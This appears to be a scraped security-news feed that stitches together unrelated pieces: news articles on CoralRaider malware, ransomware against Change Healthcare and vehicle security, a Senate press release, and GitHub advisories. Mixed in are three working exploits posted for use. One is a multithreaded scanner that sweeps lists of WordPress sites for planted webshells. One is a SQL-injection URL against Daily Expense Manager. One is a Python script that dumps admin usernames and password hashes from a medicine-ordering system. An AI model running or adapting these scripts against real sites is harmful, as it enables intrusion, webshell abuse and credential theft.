With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.

Source: incamerastock via Alamy Stock Photo

A newcomer cybercrime group linked to Vietnam has targeted individuals and organizations in Asia, attempting to steal social media account information and user data.

CoralRaider, which first appeared in late 2023, relies heavily on social engineering and legitimate services for data exfiltration, and it develops custom tools for loading malware onto victim systems. Yet the group has also made some rookie mistakes, such as inadvertently infecting their own systems, which exposed their activities, threat researchers with Cisco's Talos threat intelligence group stated in a new analysis on CoralRaider.

While Vietnam has become increasingly active in cyber operations, this group does not appear to be working with the government, says Chetan Raghuprasad, security research technical leader for Cisco's Talos group.

"The main priority is financial gain, and the actor is attempting to hijack the victim’s social media business and advertis\[ing\] accounts," he says. "The potential exposure for follow-on attacks, including delivering other malware, is also possible. Our research has not seen any examples of other payloads being delivered."

Vietnam threat actors frequently focus on social media. The infamous OceanLotus group — also known as APT32 — has attacked other governments, dissidents, and journalists in Southeast Asian countries, including in Vietnam. A military-associated group, Force 47 — linked to the Vietnamese army's official television station — regularly attempts to influence social media groups.

CoralRaider, however, appears to be connected to profit motives rather than nationalist agendas.

"At this moment, we do not have any evidence or information on signs of CoralRaider working with the Vietnamese government," Raghuprasad says.

**Multistage Infection Chain**

A CoralRaider campaign typically starts with a Windows shortcut (.LNK) file, often using a .PDF extension in an attempt to fool the victim into opening the files, according to the Cisco analysis. Following that, the attackers move through a series of stages in their attack:

1.  Windows shortcut downloads and executes an HTML application (HTA) file from an attacker-controlled server
    
2.  HTA file executes an embedded Visual Basic script
    
3.  VB script executes a PowerShell script, which then runs three more PowerShell scripts, including a series of anti-analysis checks to detect if the tool is running in a virtual machine, a bypass for the system's User Access Controls, and code that disables any notifications to the user
    
4.  Final script runs RotBot, a loader that performs detection evasion, conducts reconnaissance on the system, and downloads a configuration file
    
5.  RotBot then typically downloads XClient, which collects a variety of user data from the system, including social media account credentials
    

In addition to credentials, XClient also steals browser data, credit card account information, and other financial data. And lastly, XClient takes a screenshot of the victim's desktop and uploads it.

Meanwhile, the researchers say there are indications that the attackers had targeted individuals in Vietnam as well.

"The \[XClient\] stealer function maps the stolen victim's information to hardcoded Vietnamese words and writes them to a text file on the victim machine's temporary folder before exfiltration," the analysis stated. "One example function we observed is used to steal the victim's Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created."

**Shooting Themselves in the Foot**

The CoralRaider group used an automated bot on the Telegram service as a command-and-control channel and as well as to exfiltrate data from victims' systems. However, the cybercriminal group appears to have infected one of their own machines, because the Cisco researchers discovered screenshots of the information posted to the channel.

"Analyzing the images of the actor's Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named 'Kiém tien tử Facebook, 'Mua Bán Scan MINI,' and 'Mua Bán Scan Meta,'" Cisco Talos stated in the analysis. "Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded."

CoralRaider's arrival on the cyber threat scene is not surprising: Vietnam is currently facing an increase in threats from account-stealing malware, says Sakshi Grover, research manager in IDC's Cybersecurity Services group for the Asia/Pacific region.

"While historically less associated with cybercrime compared to other Asian nations, Vietnam's rapid adoption of digital technologies has made it more susceptible to cyber threats," she says. "Advanced persistent threats (APTs) are increasingly targeting government entities, critical infrastructure, and businesses, utilizing sophisticated techniques like custom malware and social engineering to infiltrate systems and steal sensitive data."

Because economic conditions vary across Vietnam — with some areas experiencing limited job opportunities, resulting in low wages for highly skilled roles — individuals can be incentivized to engage in cybercrime to make money, Grover says.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Vietnamese Cybercrime Group CoralRaider Nets Financial Data

Industry experts share how to implement comprehensive security strategies necessary to secure the software supply chain in Dark Reading's latest Tech Insights report.

Software supply chain attacks are relatively easy to conduct and have a significant payoff for attackers, so it's little wonder why they're top-of-mind for CISOs.

"This is especially the case if the vulnerable hardware or software has a high adoption across enterprise organizations," says ReliaQuest CISO Jeff Music.

While some software supply chain attacks, such as the ones involving MOVEit and SolarWinds, garner considerable attention, there are many software supply chain attacks occurring every day that don't get their moment in the spotlight. And no one beyond their victims ever hear about what happened.

But whether well-known or obscure, they create considerable risk for organizations.

For Dark Reading's latest Tech Insights report, "How Supply Chain Attacks Work and How to Secure Them," we interviewed experts who shared how to implement the comprehensive security strategies necessary to defend against these attacks. They include managing vendor risk, implementing security frameworks, conducting software composition analysis, and ensuring adequate DevSecOps practices are in place.

**Can't Blindly Trust Software**

In software supply chain attacks, malicious code or components are inserted into legitimate software applications or dependencies. The malicious software then enables attackers to infiltrate organizations that use those compromised systems.

Unfortunately, enterprises can't blindly trust their technology environments — from their end-user endpoints to third-party suppliers or the open-source components they rely on. These software supply chain attacks are insidious and have the power to compromise vast amounts of enterprise data and disrupt essential services across all business sectors.

In the case of MOVEit, for example, the attacks compromised the personal data of millions of people and affected more than 1,050 organizations, including those in the federal government, healthcare, education, finance, and insurance.

The stakes are high, and CISOs and security teams are grappling with these risks. Download a copy of our new report to learn from industry experts about how to implement the comprehensive security strategies necessary to defend against supply chain attacks.

**About the Author(s)**

An award winning writer and journalist, for more than 20 years George Hulme has written about business, technology, and IT security topics. He currently freelances for a wide range of publications, and is security blogger at InformationWeek.com.

Tips for Securing the Software Supply Chain

Ollama before 0.1.29 has a DNS rebinding vulnerability that can inadvertently allow remote access to the full API, thereby letting an unauthorized user chat with a large language model, delete a model, or cause a denial of service (resource exhaustion).

**Ollama DNS rebinding vulnerability**

High severity GitHub Reviewed Published Apr 8, 2024 to the GitHub Advisory Database • Updated Apr 8, 2024

GHSA-5jx5-hqx5-2vrj: Ollama DNS rebinding vulnerability

RansomHub, which is speculated to have some connection to ALPHV, has stolen 4TB of sensitive data from the beleaguered healthcare company.

Source: Lenetstan via Shutterstock

Change Healthcare reportedly is facing another attack, this time by ransomware gang RansomHub, just weeks after it became a victim in an ALPHV/BlackCat cyberattack.

RansomHub is demanding an extortion payment for an alleged 4TB of data it stole from the company; otherwise, it's threatening to sell the data to the highest bidder in 12 days.

The stolen information contains the sensitive data of US military personnel and patients, as well as medical records and financial information, among other things.

"Change Healthcare and United Health, you have one chance in protecting your clients data," RansomHub reportedly said. "The data has not been leaked anywhere and any decent threat intelligence would confirm that the data has not been shared nor posted."

This puts Change Healthcare, a subsidiary of United Healthcare, in what likely is a difficult position in having to decide whether or not paying the ransom is its best option when it has only just gotten back on its feet from the last attack. 

According to Malachi Walker, security adviser at DomainTools, whose team has been following ALPHV/BlackCat's activity, "this new information supports a few theories that our team has suggested; but no matter the case, it's unfortunate that Change Healthcare is caught in the middle of this conflict between two rival gangs," he said in an emailed statement.

"Even if not connected to BlackCat, RansomHub could be claiming ties to their victims to scare them into making a payment," he added. "There is a vast underground economy booming around the ransomware scene today where affiliate programs recruit on hacker forums, initial access brokers sell footholds into organizational networks, and ransomware groups collaborate to share information."  

Though there is significant speculation regarding whether ALPHV rebranded to RansomHub, or if there is any connection at all, Walker said there is no confirmation, as it's too early to tell.

**About the Author(s)**

Round 2: Change Healthcare Targeted in Second Ransomware Attack

PRESS RELEASE

Washington, D.C. – Following a new report about how shambolic cybersecurity practices by a federal technology contractor enabled a massive hack of the U.S. government systems, Senator Ron Wyden, D-Ore., released draft legislation today to set mandatory cybersecurity standards, save taxpayers money, and break the anti-competitive lock-in effect caused by proprietary, walled-garden software. 

Multiple disastrous hacks of U.S. government systems have been enabled by poor cybersecurity practices by Big Tech companies providing services to the government. Most recently, the Department of Homeland Security Cyber Safety Review Board cited a “cascade” of errors by Microsoft, allowing Chinese hackers to breach federal email systems. 

The Secure and Interoperable Government Collaboration Technology Act would require the government to set new secure, open standards for collaboration software, which would also promote competition and save taxpayer dollars. 

“My bill will secure the U.S. government’s communications from foreign hackers, while protecting taxpayer wallets. Vendor lock-in, bundling, and other anticompetitive practices result in the government spending vast sums of money on insecure software,” said Wyden. “It’s time to break the chokehold of big tech companies like Microsoft on government software, set high cybersecurity standards and reap the many benefits of a competitive market.” 

While phone calls and email messages allow users to communicate no matter which mobile network or email provider they use, collaboration software is frustratingly walled off. Although video conferencing software like Zoom, Webex, and Microsoft Teams offer similar functionality, users cannot communicate across platforms. Similar barriers exist for chat services like Slack and document editors like Google Docs and Microsoft Office. As a result, agencies often become locked into expensive, insecure walled gardens that result in wasted time and taxpayer dollars as government employees switch constantly between different collaboration software products.

The Secure and Interoperable Government Collaboration Technology Act would –

Require the National Institute of Standards and Technology (NIST) to identify a set of interoperable standards, requirements, and guidance for each of these collaboration technology features, based on a set of required collaboration technology features identified by the General Services Administration (GSA).

Require that, to the fullest extent possible, the standards use end-to-end encryption and other technologies to protect U.S. government communications from foreign surveillance.

Require that collaboration technologies used by federal agencies enable those agencies to comply with federal record-keeping requirements.

Four years after NIST identifies the standards, require that collaboration technology procured by the federal government be capable of communicating using the NIST standards. 

Tasks the Department of Homeland Security with conducting cybersecurity reviews of collaboration technology products widely used by the federal government.

Create a GSA and Office of Management and Budget working group to produce biennial reviews of collaboration tech used by the federal government to suggest additions or improvements to the standards.

The draft legislation is endorsed by Accountable Tech, Demand Progress, Fight for the Future, Proton, Nym, the Matrix.org Foundation, and Cory Doctorow.

“Interoperability - the ability to plug something new into a technology, with or without permission from the manufacturer - is the key to defeating Big Tech,” said Doctorow. “This bill will require public funds to be spent on technology that anyone can fix, extend, or improve, preventing tech companies from locking in and ripping off the US government. The most amazing part is that this isn't already the way it's done.”

“Through this legislation, the federal government has the opportunity to set an example for workplaces, organizations, and institutions across the country on how to fundamentally improve online safety. Protecting digital communication with end-to-end encryption is essential to data privacy and security, and should be the standard across the board. Without it, messages can be intercepted and abused by hackers, repressive law enforcement agencies, foreign governments, or the company that owns the platform itself. Everyone from the former director of the NSA, to Big Tech companies, to human rights defenders working under authoritarian regimes have highlighted the life-saving importance of end-to-end encryption. The issue of data privacy has never been more urgent, and decisive lawmaker action is needed in this moment to bring about tech platform policies that truly center our privacy and needs as users—not corporate profits,” said Leila Nashashibi, campaigner at Fight for the Future. 

Wyden is accepting feedback on the draft legislation at \[email protected\]

The text of the draft bill is available here. 

A one-page summary of the bill is here.

Wyden Releases Draft Legislation to End Federal Dependence on Insecure, Proprietary Software

As manufacturers sprint to add software-defined features for vehicles, the ability for third-party maintenance and repair falls behind, leaving businesses with few choices to manage their cybersecurity.

Source: Open Studio via Shutterstock

When Israel-based REE Automotive designed its P7 electric vehicle chassis, it worked from the software out: The flat vehicle chassis is totally configurable with four independent modules near each tire for steering, braking, suspension, and power train, each driven by an electronic control unit (ECU) customizable through software.

It has drive-by-wire, steer-by-wire, and brake-by-wire — and data collection as a service — giving the company the ability to tailor the vehicle to the customer's application, but also potentially making the platform a hacker's dream.

Securing a vehicle fleet is a major effort, requiring cybersecurity for the design and development teams, the factory floor, and the connected vehicles themselves, says Yaron Edan, CISO for the automotive technology company. Cybersecurity teams not only have to monitor cyber threats, but also manage the security of the supply chain, the operation technology (OT) in the factory, and the vehicle network used to monitor and update the platform.

"My headache, my concern, is basically divided in two: our network \[which supports the creation of the platform\], but that is not enough," he says. "We need to figure out what are the threats, and monitor \[for those\] all day long for each vehicle through our SOC."

Such security efforts, however, have another challenge: The success of "right to repair" efforts to open up all kinds of consumer and enterprise technology to allow customers to fix the devices that they buy. The passage of a Massachusetts law, for instance, calls for auto manufacturers and automotive-technology makers to share information and data produced by vehicles to allow consumers and third parties to maintain, repair, and even modify their vehicles.

While the National Highway Traffic Safety Administration (NHTSA) initially ruled that existing federal safety regulations preempted the laws — saying, "\[f\]ederal law does not allow a manufacturer to sell vehicles that it knows contains a safety defect" — the state and federal governments eventually came to an agreement over implementation: Automakers would be required to give third parties the ability to locally access data and systems to the vehicles they own, but the remote diagnostic and update networks can remain closed, the regulators ruled.

**EVs Bring Great Flexibility and Risk**

Whether the agreement will help companies with large fleets of vehicles, especially electric vehicles, remains an open question. Software-defined vehicles really took off with EVs — and the example of Tesla's success — and the most significant software-based capabilities will likely remain with electric vehicles.

EV makers can build their platforms starting with initial design using software that can be updated to change the configuration and performance of the vehicles all the way through deployment and beyond, says Alex Oyler, director for North America at SBD Automotive, an auto supply chain consultancy.

The ability to effectively and quickly respond to cybersecurity events will likely remain with those manufacturers, not third parties, he says.

"If there's a really critical zero-day, and that needs to be patched as soon as possible, those product cybersecurity teams \[at auto manufacturers\] are running the show, coordinating stakeholders across the business and accelerating timelines to patch things," he says. "It's not an easy process today, that's for sure."

Some manufacturers may outsource the cybersecurity function, however. The United Nations passed an amendment for product safety requiring the countries which are part of the UN Economic Commission for Europe have regulatory approval of the cybersecurity management systems used in vehicles.

**Connectivity Will Only Grow**

Vehicles have been connected for decades, whether as part of an in-vehicle maintenance system or driver assistance. Yet, software-defined vehicles have expanded that connectivity, such as remote start via a smartphone app and tracking limited diagnostics for the consumer — essentially turning cars into Internet-of-things (IoT) devices. As automobile manufacturers offer more accessibility through APIs, more risk will follow, says Shira Sarid-Hausirer, a vice president at Upstream, an automotive cybersecurity and data management firm.

"Opening up to the ecosystem is what has probably introduced the most risk," she says, pointing to various cybersecurity hacks of Tesla vehicles. "What happens when OEMs started to open up their APIs to other third-party apps that can now send commands into your vehicle? ... The vehicle is becoming a hub for technology."

Giving companies access to some of that data to allow fleet management may be enough, while the agreement in the Massachusetts Right to Repair law allows some third parties to offer vehicle maintenance services — although, probably at great cost. Whether those restrictions will ameliorate in the future, as the fast pace of SDV innovation slows, remains to be seen, SBD Automotive's Oyler says.

"It's somewhat fair for both NHTSA and automakers to raise some flags, but that said, there is a secure way to share diagnostic information, and the software defined vehicle actually provides a way to do that through those secure channels," he says.

**Cyberattacks Unlikely to be Catastrophic, Mostly**

Automakers' recent focus on cybersecurity has resulted in much more secure platforms over the past decade. But the focus for the future needs to be on delivering that security and safety, while offering more transparency to customers, Oyler says. As enterprise customers and individual vehicle owners demand more maintainability and reusability in their devices, automakers will need to follow.

Properly designed platforms can also drastically reduce the risk of a widespread cyberattack, says Upstream's Sarid-Hausirer. The company already handles threat intelligence and incident response for some manufacturers and most incidents are not safety-related, but the company does classify half of all incidents as massive or high severity, according to the company's "2024 Automotive Cybersecurity Report."

"I can tell you that the vast majority of incidents that we see do not necessarily jeopardize safety, because there needs to be a reason to jeopardize your safety, and attackers don't work that way — they're out there to make money," she says. Instead, the company has seen a lot of attacks on availability. "They manipulate the app, so that you cannot start your trucks or get into your trucks in the morning. It could be ransomware, it could be other forms, but availability and fleets is something that has to be discussed."

Other attacks have used ride-hailing apps to cause traffic jams in Moscow and hacks for remote start apps. Those availability issues are less to do with diagnostic systems, such as the information necessary for right to repair, and more to do with the management systems, she says.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Software-Defined Vehicle Fleets Face a Twisty Road on Cybersecurity

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

Daily Expense Manager version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi# Date: February 25th, 2024# Exploit Author: Stefan Hesselman# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip# Version: 1.0# Tested on: Kali Linux# CVE: N/A# CWE: CWE-89, CWE-74## DescriptionDaily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.## Vulnerable endpoint:http://example.com/Daily-Expense-Manager/readxp.php?term=asd## Vulnerable HTTP parameter:term (GET)## Exploit proof-of-concept:http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-## Vulnerable PHP code:File: /Daily-Expense-Manager/readxp.php, Lines: 16-23<?php[...]//get search term$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.//get matched data from skills table$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");while ($row = $query->fetch_assoc()) {    $data[] = $row['pname'];}//return json dataecho json_encode($data);?>

Daily Expense Manager 1.0 SQL Injection

Open Source Medicine Ordering System version 1.0 suffers from a remote SQL Injection vulnerability.

    # Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi# Author : Onur Karasalihoğlu# Date : 27/02/2024# Sample Usage% python3 omos_sqli_exploit.py https://target.comAvailable Databases:1. information_schema2. omosdbPlease select a database to use (enter number): 2You selected: omosdbExtracted Admin Users Data:1 | Adminstrator | Admin |  | 0192023a7bbd73250516f069df18b500 | admin2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith'''import requestsimport reimport sysdef fetch_database_names(domain):    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"        try:        # HTTP request        response = requests.get(url)        response.raise_for_status()  # exception for 4xx and 5xx requests                # data extraction        pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')        extracted_data = pattern.search(response.text)        if extracted_data:            databases = extracted_data.group(1).split(',')            databases = [db.replace('"', '') for db in databases]            print("Available Databases:")            for i, db in enumerate(databases, start=1):                print(f"{i}. {db}")                        # users should select omos database            choice = int(input("Please select a database to use (enter number): "))            if 0 < choice <= len(databases):                selected_db = databases[choice - 1]                print(f"You selected: {selected_db}")                fetch_data(domain, selected_db)            else:                print("Invalid selection.")        else:            print("No data extracted.")    except requests.RequestException as e:        print(f"HTTP Request failed: {e}")def fetch_data(domain, database_name):    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"        try:        # HTTP request        response = requests.get(url)        response.raise_for_status()  # exception for 4xx and 5xx requests                # data extraction        pattern = re.compile(r'enforsec\[(.*?)\]enforsec')        extracted_data = pattern.search(response.text)        if extracted_data:            print("Extracted Admin Users Data:")            data = extracted_data.group(1)            rows = data.split('","')            for row in rows:                clean_row = row.replace('"', '')                user_details = clean_row.split(',')                print(" | ".join(user_details))        else:            print("No data extracted.")    except requests.RequestException as e:        print(f"HTTP Request failed: {e}")def main():    if len(sys.argv) != 2:        print("Usage: python3 omos_sqli_exploit.py <domain>")        sys.exit(1)    fetch_database_names(sys.argv[1])if __name__ == "__main__":    main()

Open Source Medicine Ordering System 1.0 SQL Injection

### Impact

When a authentificated request is made to `POST /store-api/account/logout`, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on `CustomerLogoutEvent` and invalidates the session additionally. 

### Patches
The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

### Workarounds
When you are not able to update, you can install the latest version of the Shopware Security Plugin.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-31447

**Shopware Improper Session Handling in store-api account logout**

Moderate severity GitHub Reviewed Published Apr 8, 2024 in shopware/shopware • Updated Apr 8, 2024

**Package**

composer shopware/core (Composer)

**Affected versions**

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Patched versions**

6.5.8.8

6.6.1.0

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Impact**

When a authentificated request is made to POST /store-api/account/logout, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on CustomerLogoutEvent and invalidates the session additionally.

**Patches**

The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

**Workarounds**

When you are not able to update, you can install the latest version of the Shopware Security Plugin.

**References**

*   GHSA-5297-wrrp-rcj7
*   shopware/shopware@5cc84dd
*   shopware/shopware@d29775a

Published to the GitHub Advisory Database

Apr 8, 2024

Tag

#auth